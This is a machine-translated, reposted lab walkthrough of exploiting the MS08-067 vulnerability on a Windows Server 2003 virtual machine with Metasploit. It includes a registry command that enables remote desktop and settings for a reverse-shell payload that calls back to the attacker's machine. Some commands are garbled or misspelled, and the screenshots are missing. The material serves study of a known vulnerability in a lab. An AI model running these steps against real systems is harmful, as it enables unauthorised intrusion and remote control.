当前位置:网站首页>Mid penetration test -- vulnerability recurrence -- MS08_ 067

Mid penetration test -- vulnerability recurrence -- MS08_ 067

2021-01-23 18:18:08 Alan in the snow

Drone aircraft :Win2k3    10.10.10.130

attack :BT5      10.10.10.128

One :nmap see WinK3 Open port 3389

  

 

  to open up 3389 Method : My computer -> attribute -> long-range

  

 

    Command line mode on 3389 port ( Any port ):

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f > C:\WINDOWS\system32\3389.bat && call 3389.bat

 

Two 、 Attack phase

  1、 lookup ms08_067 Vulnerability module

   

 

   2、 call 08_067_netapi Penetration module

 

 

   3、 Check the attack load corresponding to this penetration module

 

 

   4、 View the setup parameters and set the required parameters

  

set payloads generic/shell_reverse_tcp  # Set up the required modules 

set options # View the parameters of the settings required by the module 

  

set RHOST 10.10.10.130 # Set target host 
set LRHOST 10.10.10.128 # Set up this machine 
set LPORT 5000  # Set the port between the attacker and the target 
show targets 
set target 7  # adopt show targets  You can see what vulnerability supports windows edition , And set the version serial number corresponding to the target host 

 

 

 5、 Start the attack

  

 

  You can see that it's already win2k3 Of C The disk is in the directory

    

 

版权声明
本文为[Alan in the snow]所创,转载请带上原文链接,感谢
https://chowdera.com/2021/01/20210123181737392f.html

随机推荐